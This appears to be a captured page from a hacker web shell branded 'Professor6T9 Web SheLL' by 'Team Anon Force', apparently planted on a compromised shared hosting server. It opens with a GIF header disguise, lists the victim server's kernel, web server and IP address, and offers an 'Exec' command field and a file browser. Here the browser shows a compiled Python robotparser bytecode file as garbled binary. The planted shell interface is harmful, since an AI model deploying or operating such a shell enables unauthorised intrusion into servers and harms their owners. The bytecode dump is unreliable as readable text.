GIF89;aGIF89;aGIF89;a
Team Anon Force
https://t.me/Professor6T9x
Professor6T9 Web SheLL
Linux premium264.web-hosting.com 4.18.0-553.45.1.lve.el8.x86_64 #1 SMP Wed Mar 26 12:08:09 UTC 2025 x86_64
LiteSpeed
69.57.162.12
/
opt
/
cloudlinux
/
venv
/
lib64
/
python3.11
/
site-packages
/
future
/
backports
/
urllib
/
__pycache__
[ HOME ]
Exec
Submit
File Name : robotparser.cpython-311.pyc
� � h� � � � d dl mZmZmZ d dlmZ d dlmZ d dlm Z mZ e e_ ee_ dgZ G d� de� � Z G d� de� � Z G d � d e� � ZdS )� )�absolute_import�division�unicode_literals��str)�urllib)�parse�request�RobotFileParserc �J � e Zd ZdZd d�Zd� Zd� Zd� Zd� Zd� Z d � Z d � Zd� ZdS )r zs This class provides a set of methods to read, parse and answer questions about a single robots.txt file. � c �v � g | _ d | _ d| _ d| _ | � |� � d| _ d S )NFr )�entries� default_entry�disallow_all� allow_all�set_url�last_checked��self�urls �t/builddir/build/BUILD/cloudlinux-venv-1.0.8/venv/lib/python3.11/site-packages/future/backports/urllib/robotparser.py�__init__zRobotFileParser.__init__ s@ � ����!���!���������S��������� c � � | j S )z�Returns the time the robots.txt file was last fetched. This is useful for long-running web spiders that need to check for new robots.txt files periodically. )r �r s r �mtimezRobotFileParser.mtime&